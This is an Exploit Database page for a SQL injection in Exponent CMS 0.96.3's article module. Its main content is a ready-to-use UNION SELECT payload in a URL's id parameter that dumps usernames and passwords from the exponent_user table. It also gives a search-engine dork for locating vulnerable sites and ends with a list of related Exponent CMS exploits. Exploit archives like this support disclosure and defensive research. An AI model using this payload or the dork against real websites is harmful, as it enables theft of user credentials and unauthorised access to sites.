Exploit Database - Logo

Exponent CMS 0.96.3 - (articlemodule) SQL Injection

EDB-ID: 11349 Author: T u R c O Published: 2010-02-07
CVE: N/A Type: Webapps Platform: PHP
Aliases: N/A Advisory/Source: N/A Tags: Vulnerability
E-DB Verified: Verified Exploit: Download Exploit Code Download / View Raw Vulnerable App: Download Vulnerable Application
« Previous Exploit Next Exploit » 
Exponent CMS 0.96.3 (articlemodule) Sql Injection Vulnerability 
======================================================== 
  
#################################################################### 
# Author : T u R c O
# Home   : www.1923Turk.com
# Script : exponentcms
# Dork: "Welcome to Exponent CMS" | "my new exponent site"  inurl:articlemodule
              
  
#################################################################### 
  
===[ Exploit ]=== 
  
http://server/index.php?action=view_article&module=articlemodule&id= SQL INJECTION
  
  -1+union+select+1,2,3,password,username,6+from+exponent_user--

Demo:

http:/server/index.php?action=view_article&module=articlemodule&id=-1+union+select+1,2,3,password,username,6+from+exponent_user--

   
####################################################################

Related Exploits

Trying to match setup file: 627ff741e205cbb4ea699bb28a1f63e9
Other Possible E-DB Search Terms: Exponent CMS 0.96.3,  Exponent CMS
Date D V Title Author
2005-12-25Download Exploit Code Verified Exponent CMS 0.95 - Multiple Cross-Site Scripting Vulnerabilitiesy3dips
2007-04-20Download Exploit Code Verified Exponent CMS 0.96.5/0.96.6 - 'iconspopup.php' 'icodir' Parameter Traversal Arbitrary Directory ListingHamid Ebadi
2007-04-20Download Exploit Code Verified Exponent CMS 0.96.5/0.96.6 - magpie_debug.php url Parameter Cross-Site ScriptingHamid Ebadi
2007-04-20Download Exploit Code Verified Exponent CMS 0.96.5/0.96.6 - magpie_slashbox.php rss_url Parameter Cross-Site ScriptingHamid Ebadi
2010-07-07Download Exploit Code Verified Exponent CMS 0.97 - 'Slideshow.js.php' Cross-Site ScriptingAndrei Rims...
2012-03-07Download Exploit Code Verified Exponent CMS 2.0 - 'src' Parameter SQL InjectionRob Miller
2011-05-02Download Exploit Code Waiting verification Exponent CMS 2.0 Beta 1.1 - Cross-Site Request Forgery (Add Administrator Account) (PoC)outlaw.dll
2011-05-09Download Exploit Code Verified Exponent CMS 2.0.0 Beta 1.1 - Local File Inclusion / Arbitrary File UploadAutoSec Tools
2013-05-17Download Exploit Code Waiting verification Exponent CMS 2.2.0 Beta 3 - Multiple VulnerabilitiesHigh-Tech B...
2006-09-19Download Exploit Code Verified Exponent CMS 0.96.3 - (view) Remote Command Executionrgod
2010-10-13Download Exploit Code Verified Exponent CMS 0.97 - Multiple VulnerabilitiesLiquidWorm
2015-02-12Download Exploit Code Waiting verification Exponent CMS 2.3.1 - Multiple Cross-Site Scripting VulnerabilitiesMayuresh Dani
2016-09-22Download Exploit Code Waiting verification Exponent CMS 2.3.9 - Blind SQL InjectionManuel Garc...
Menu